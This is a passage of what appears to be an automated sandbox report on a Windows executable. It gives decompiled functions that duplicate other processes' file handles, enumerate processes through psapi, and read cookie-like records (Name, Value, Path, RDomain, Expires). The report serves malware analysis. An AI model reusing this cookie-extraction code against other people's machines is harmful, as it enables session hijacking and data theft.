                                                                                                                                                      								}
                                                                                                                                                      								L24:
                                                                                                                                                      								CloseHandle(_v16);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _v28;
                                                                                                                                                      							if(_v28 == 0) {
                                                                                                                                                      								goto L26;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L27;
                                                                                                                                                      						L26:
                                                                                                                                                      						_v20 = _v20 + 1;
                                                                                                                                                      					} while (_v20 < _v44);
                                                                                                                                                      				}
                                                                                                                                                      				L27:
                                                                                                                                                      				if(_v100 != 0) {
                                                                                                                                                      					FreeLibrary(_v100); // executed
                                                                                                                                                      					_v100 = 0;
                                                                                                                                                      				}
                                                                                                                                                      				E00403F55( &_v56);
                                                                                                                                                      				E00403F55( &_v72);
                                                                                                                                                      				return _v28;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040C725
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
                                                                                                                                                      • memset.MSVCRT ref: 0040C8AF
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040C902
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 832456665-0
                                                                                                                                                      • Opcode ID: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
                                                                                                                                                      • Instruction ID: de6e42d4d0ab8c6b3742c2937cd5abb5ca9b3ab329c089935e202bb2c8060a11
                                                                                                                                                      • Opcode Fuzzy Hash: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
                                                                                                                                                      • Instruction Fuzzy Hash: 6A81F2B1C00219EFDB10EFA5C9859AEBBB5FB08305F6085BAE905B7291D7385E44CF58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                      				struct HRSRC__* _t12;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				signed int _t18;
                                                                                                                                                      				signed int _t26;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      				signed int _t33;
                                                                                                                                                      				struct HRSRC__* _t35;
                                                                                                                                                      				signed int _t36;
                                                                                                                                                      
                                                                                                                                                      				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                                                      				_t35 = _t12;
                                                                                                                                                      				if(_t35 != 0) {
                                                                                                                                                      					_t33 = SizeofResource(_a4, _t35);
                                                                                                                                                      					if(_t33 > 0) {
                                                                                                                                                      						_t16 = LoadResource(_a4, _t35);
                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                      							_t17 = LockResource(_t16);
                                                                                                                                                      							if(_t17 != 0) {
                                                                                                                                                      								_a4 = _t33;
                                                                                                                                                      								_t29 = _t33 * _t33;
                                                                                                                                                      								_t36 = 0;
                                                                                                                                                      								_t7 =  &_a4;
                                                                                                                                                      								 *_t7 = _a4 >> 2;
                                                                                                                                                      								if( *_t7 != 0) {
                                                                                                                                                      									do {
                                                                                                                                                      										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                                                      										_t36 = _t36 + 1;
                                                                                                                                                      										_t29 = _t26;
                                                                                                                                                      									} while (_t36 < _a4);
                                                                                                                                                      								}
                                                                                                                                                      								_t18 =  *0x412b10; // 0x10350e5a
                                                                                                                                                      								 *0x412b10 = _t18 + _t29 ^ _t33;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return 1;
                                                                                                                                                      			}













                                                                                                                                                      APIs
                                                                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040DA35
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                      • Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                      • Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
                                                                                                                                                      • Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                      • Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
                                                                                                                                                      				signed int _t5;
                                                                                                                                                      				long _t7;
                                                                                                                                                      
                                                                                                                                                      				_t5 =  *__eax;
                                                                                                                                                      				if(_t5 == 0) {
                                                                                                                                                      					return _t5 | 0xffffffff;
                                                                                                                                                      				}
                                                                                                                                                      				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
                                                                                                                                                      				return _t7;
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationQuerySystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3562636166-0
                                                                                                                                                      • Opcode ID: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
                                                                                                                                                      • Instruction ID: c4ee8ba0ae0e5c888482442c657d74a2bffdce45b5391c025a143593a4db9a10
                                                                                                                                                      • Opcode Fuzzy Hash: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
                                                                                                                                                      • Instruction Fuzzy Hash: 16C0123D108200FEDA014BA08C40E0FB791AF89770F14CB19B174900E0C2B1D020A722
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
                                                                                                                                                      				char _v4;
                                                                                                                                                      				char _v8;
                                                                                                                                                      				struct HWND__* _v12;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				struct HWND__* _t53;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      				struct HWND__* _t69;
                                                                                                                                                      				struct HWND__* _t71;
                                                                                                                                                      				struct HWND__* _t76;
                                                                                                                                                      				int _t82;
                                                                                                                                                      				int _t84;
                                                                                                                                                      				struct HWND__* _t85;
                                                                                                                                                      				void* _t93;
                                                                                                                                                      				struct HWND__* _t107;
                                                                                                                                                      				struct HWND__* _t108;
                                                                                                                                                      
                                                                                                                                                      				_t93 = __edx;
                                                                                                                                                      				_t92 = __ecx;
                                                                                                                                                      				E0040E340(0x27a4, __ecx);
                                                                                                                                                      				_t42 = E00402754(_t92);
                                                                                                                                                      				if(_t42 != 0) {
                                                                                                                                                      					E0040DA9D();
                                                                                                                                                      					SetErrorMode(0x8001); // executed
                                                                                                                                                      					 *0x412b10 = 0x11223344;
                                                                                                                                                      					EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
                                                                                                                                                      					E0040621C( &_v4);
                                                                                                                                                      					_push( &_a76);
                                                                                                                                                      					_a36 = 0x20;
                                                                                                                                                      					_a28 = 0;
                                                                                                                                                      					_a40 = 0;
                                                                                                                                                      					_a32 = 0;
                                                                                                                                                      					_a44.hwnd = 0;
                                                                                                                                                      					E0040BB15(__eflags);
                                                                                                                                                      					_a1800 =  &_v8;
                                                                                                                                                      					E004064A1(_t92, __eflags,  &_v8, _a12);
                                                                                                                                                      					_t53 = E004065C4(_a1792, L"/savelangfile");
                                                                                                                                                      					__eflags = _t53;
                                                                                                                                                      					if(_t53 < 0) {
                                                                                                                                                      						E00407259(); // executed
                                                                                                                                                      						__eflags = E004065C4(_a1800, L"/deleteregkey");
                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                      							__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
                                                                                                                                                      							if(__eflags <= 0) {
                                                                                                                                                      								L7:
                                                                                                                                                      								E0040BA94( &_a72);
                                                                                                                                                      								__eflags = _a664 - 3;
                                                                                                                                                      								if(_a664 != 3) {
                                                                                                                                                      									_push(5);
                                                                                                                                                      								} else {
                                                                                                                                                      									_push(3);
                                                                                                                                                      								}
                                                                                                                                                      								ShowWindow(_a592, ??);
                                                                                                                                                      								UpdateWindow(_a592);
                                                                                                                                                      								_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
                                                                                                                                                      								__eflags = GetMessageW( &_a44, 0, 0, 0);
                                                                                                                                                      								while(__eflags != 0) {
                                                                                                                                                      									_t69 =  *0x412c2c; // 0x0
                                                                                                                                                      									__eflags = _t69;
                                                                                                                                                      									_t107 = _t69;
                                                                                                                                                      									if(_t69 == 0) {
                                                                                                                                                      										L14:
                                                                                                                                                      										_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
                                                                                                                                                      										__eflags = _t71;
                                                                                                                                                      										if(_t71 == 0) {
                                                                                                                                                      											goto L15;
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_t85 = GetForegroundWindow();
                                                                                                                                                      										__eflags = _t107 - _t85;
                                                                                                                                                      										if(_t107 == _t85) {
                                                                                                                                                      											L15:
                                                                                                                                                      											_t108 =  *0x412c2c; // 0x0
                                                                                                                                                      											_v12 = _a1820;
                                                                                                                                                      											_t76 = IsDialogMessageW(_a592,  &_a44);
                                                                                                                                                      											__eflags = _t76;
                                                                                                                                                      											if(_t76 == 0) {
                                                                                                                                                      												__eflags = _t108;
                                                                                                                                                      												if(_t108 == 0) {
                                                                                                                                                      													L18:
                                                                                                                                                      													__eflags = _v12;
                                                                                                                                                      													if(_v12 == 0) {
                                                                                                                                                      														L20:
                                                                                                                                                      														TranslateMessage( &_a44);
                                                                                                                                                      														DispatchMessageW( &_a44);
                                                                                                                                                      													} else {
                                                                                                                                                      														_t82 = IsDialogMessageW(_v12,  &_a44);
                                                                                                                                                      														__eflags = _t82;
                                                                                                                                                      														if(_t82 == 0) {
                                                                                                                                                      															goto L20;
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												} else {
                                                                                                                                                      													_t84 = IsDialogMessageW(_t108,  &_a44);
                                                                                                                                                      													__eflags = _t84;
                                                                                                                                                      													if(_t84 == 0) {
                                                                                                                                                      														goto L18;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											goto L14;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = GetMessageW( &_a44, 0, 0, 0);
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = E0040BD40( &_a72, _t93, __eflags);
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									goto L7;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						 *0x4131d0 = 0x412374;
                                                                                                                                                      						E004073F7(_t92);
                                                                                                                                                      					}
                                                                                                                                                      					E0040BC51( &_a72, __eflags);
                                                                                                                                                      					E0040623E( &_v8);
                                                                                                                                                      					E00403F55( &_a24);
                                                                                                                                                      					E0040623E( &_v8);
                                                                                                                                                      					_t60 = 0;
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t60 = _t42 + 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _t60;
                                                                                                                                                      			}




















                                                                                                                                                      0x0040c055
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c055
                                                                                                                                                      0x0040c049
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c005
                                                                                                                                                      0x0040c090
                                                                                                                                                      0x0040c090
                                                                                                                                                      0x0040bf7f
                                                                                                                                                      0x0040bf88
                                                                                                                                                      0x0040bf8a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf8a
                                                                                                                                                      0x0040bf7d
                                                                                                                                                      0x0040bf40
                                                                                                                                                      0x0040bf40
                                                                                                                                                      0x0040bf4a
                                                                                                                                                      0x0040bf4a
                                                                                                                                                      0x0040c09c
                                                                                                                                                      0x0040c0a5
                                                                                                                                                      0x0040c0ae
                                                                                                                                                      0x0040c0b7
                                                                                                                                                      0x0040c0bc
                                                                                                                                                      0x0040c0bc
                                                                                                                                                      0x0040beb4
                                                                                                                                                      0x0040beb4
                                                                                                                                                      0x0040beb4
                                                                                                                                                      0x0040c0c4

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                        • Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                        • Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                        • Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
                                                                                                                                                      • EnumResourceTypesW.KERNEL32 ref: 0040BEE6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                      • Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                      • Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
                                                                                                                                                      • Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                      • Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040D071(struct HINSTANCE__** __esi) {
                                                                                                                                                      				void* _t7;
                                                                                                                                                      				struct HINSTANCE__* _t8;
                                                                                                                                                      				_Unknown_base(*)()* _t14;
                                                                                                                                                      
                                                                                                                                                      				if( *__esi == 0) {
                                                                                                                                                      					_t8 = LoadLibraryW(L"psapi.dll"); // executed
                                                                                                                                                      					 *__esi = _t8;
                                                                                                                                                      					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
                                                                                                                                                      					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                                                      					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
                                                                                                                                                      					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                                                      					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                                                      					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                                                      					__esi[4] = _t14;
                                                                                                                                                      					return _t14;
                                                                                                                                                      				}
                                                                                                                                                      				return _t7;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,747859F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                      • API String ID: 2238633743-4233621989
                                                                                                                                                      • Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                      • Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
                                                                                                                                                      • Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                      • Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				int _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                      				int _v60;
                                                                                                                                                      				int _v64;
                                                                                                                                                      				int _v68;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				int _v80;
                                                                                                                                                      				int _v84;
                                                                                                                                                      				int _v88;
                                                                                                                                                      				int _v92;
                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                      				intOrPtr _v104;
                                                                                                                                                      				intOrPtr _v108;
                                                                                                                                                      				signed int _v112;
                                                                                                                                                      				signed int _v116;
                                                                                                                                                      				void _v124;
                                                                                                                                                      				void _v132;
                                                                                                                                                      				void _v136;
                                                                                                                                                      				char _v140;
                                                                                                                                                      				char _v912;
                                                                                                                                                      				char _v936;
                                                                                                                                                      				char _v1496;
                                                                                                                                                      				char _v1500;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t89;
                                                                                                                                                      				signed int _t109;
                                                                                                                                                      				signed int _t114;
                                                                                                                                                      				intOrPtr _t119;
                                                                                                                                                      				intOrPtr _t120;
                                                                                                                                                      				intOrPtr _t121;
                                                                                                                                                      				intOrPtr _t122;
                                                                                                                                                      				intOrPtr _t123;
                                                                                                                                                      				intOrPtr _t124;
                                                                                                                                                      				intOrPtr _t125;
                                                                                                                                                      				intOrPtr* _t137;
                                                                                                                                                      				intOrPtr* _t139;
                                                                                                                                                      				void* _t142;
                                                                                                                                                      				intOrPtr _t147;
                                                                                                                                                      				intOrPtr _t148;
                                                                                                                                                      				void* _t151;
                                                                                                                                                      				void* _t163;
                                                                                                                                                      
                                                                                                                                                      				_t151 = __edx;
                                                                                                                                                      				_v76 = 0x100;
                                                                                                                                                      				_v56 = 0x100;
                                                                                                                                                      				_v80 = 0;
                                                                                                                                                      				_v92 = 0;
                                                                                                                                                      				_v88 = 0;
                                                                                                                                                      				_v84 = 0;
                                                                                                                                                      				_v60 = 0;
                                                                                                                                                      				_v72 = 0;
                                                                                                                                                      				_v68 = 0;
                                                                                                                                                      				_v64 = 0;
                                                                                                                                                      				E00403E49( &_v1500);
                                                                                                                                                      				_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
                                                                                                                                                      				_t164 = _t89;
                                                                                                                                                      				if(_t89 == 0) {
                                                                                                                                                      					L30:
                                                                                                                                                      					E00403E8F( &_v912);
                                                                                                                                                      					E00403F55( &_v936);
                                                                                                                                                      					E00406710( &_v1496);
                                                                                                                                                      					E00406355( &_v72);
                                                                                                                                                      					return E00406355( &_v92);
                                                                                                                                                      				} else {
                                                                                                                                                      					_v12 = 0x20;
                                                                                                                                                      					_v20 = 0;
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      					_v16 = 0;
                                                                                                                                                      					do {
                                                                                                                                                      						if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
                                                                                                                                                      							_t161 =  &_v20;
                                                                                                                                                      							_v24 = E004039C1( &_v20, L"Name");
                                                                                                                                                      							_v28 = E004039C1( &_v20, L"Value");
                                                                                                                                                      							_v32 = E004039C1( &_v20, L"Path");
                                                                                                                                                      							_v36 = E004039C1( &_v20, L"RDomain");
                                                                                                                                                      							_v48 = E004039C1(_t161, L"Expires");
                                                                                                                                                      							_v52 = E004039C1(_t161, L"LastModified");
                                                                                                                                                      							_v44 = E004039C1(_t161, L"EntryId");
                                                                                                                                                      							_v40 = E004039C1(_t161, L"Flags");
                                                                                                                                                      							if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
                                                                                                                                                      								_t109 = memset( &_v136, 0, 0x2c);
                                                                                                                                                      								_t163 = _t163 + 0xc;
                                                                                                                                                      								E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
                                                                                                                                                      								E0040518A( &_v92, _v36);
                                                                                                                                                      								_t114 = _v92;
                                                                                                                                                      								_v112 = 0x40f454;
                                                                                                                                                      								if(_t114 != 0) {
                                                                                                                                                      									_v112 = _t114;
                                                                                                                                                      								}
                                                                                                                                                      								E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
                                                                                                                                                      								E0040518A( &_v72, _v32);
                                                                                                                                                      								_t119 = _v72;
                                                                                                                                                      								_v116 = 0x40f454;
                                                                                                                                                      								if(_t119 != 0) {
                                                                                                                                                      									_v116 = _t119;
                                                                                                                                                      								}
                                                                                                                                                      								_t120 = _v24;
                                                                                                                                                      								_t147 =  *((intOrPtr*)(_t120 + 0x328));
                                                                                                                                                      								if(_t147 <= 0) {
                                                                                                                                                      									_v108 = 0x40f924;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t139 = _t120 + 0x220;
                                                                                                                                                      									 *((char*)(_t147 +  *_t139 - 1)) = 0;
                                                                                                                                                      									_v108 =  *_t139;
                                                                                                                                                      								}
                                                                                                                                                      								_t121 = _v28;
                                                                                                                                                      								_t148 =  *((intOrPtr*)(_t121 + 0x328));
                                                                                                                                                      								if(_t148 <= 0) {
                                                                                                                                                      									_v104 = 0x40f924;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t137 = _t121 + 0x220;
                                                                                                                                                      									 *((char*)( *_t137 + _t148 - 1)) = 0;
                                                                                                                                                      									_v104 =  *_t137;
                                                                                                                                                      								}
                                                                                                                                                      								_t122 = _v48;
                                                                                                                                                      								if(_t122 != 0) {
                                                                                                                                                      									memcpy( &_v132, _t122 + 0x220, 8);
                                                                                                                                                      									_t163 = _t163 + 0xc;
                                                                                                                                                      								}
                                                                                                                                                      								_t123 = _v52;
                                                                                                                                                      								if(_t123 != 0) {
                                                                                                                                                      									memcpy( &_v124, _t123 + 0x220, 8);
                                                                                                                                                      									_t163 = _t163 + 0xc;
                                                                                                                                                      								}
                                                                                                                                                      								_t124 = _v40;
                                                                                                                                                      								if(_t124 != 0) {
                                                                                                                                                      									_v96 =  *((intOrPtr*)(_t124 + 0x220));
                                                                                                                                                      								}
                                                                                                                                                      								_t125 = _v44;
                                                                                                                                                      								if(_t125 == 0) {
                                                                                                                                                      									_v140 = 0;
                                                                                                                                                      									_v136 = 0;
                                                                                                                                                      								} else {
                                                                                                                                                      									_v140 =  *((intOrPtr*)(_t125 + 0x220));
                                                                                                                                                      									_v136 =  *((intOrPtr*)(_t125 + 0x224));
                                                                                                                                                      								}
                                                                                                                                                      								_v100 = _a8;
                                                                                                                                                      								 *((intOrPtr*)( *_a4))( &_v140);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} while (E0040489D( &_v1500) != 0);
                                                                                                                                                      					if(_v20 != 0) {
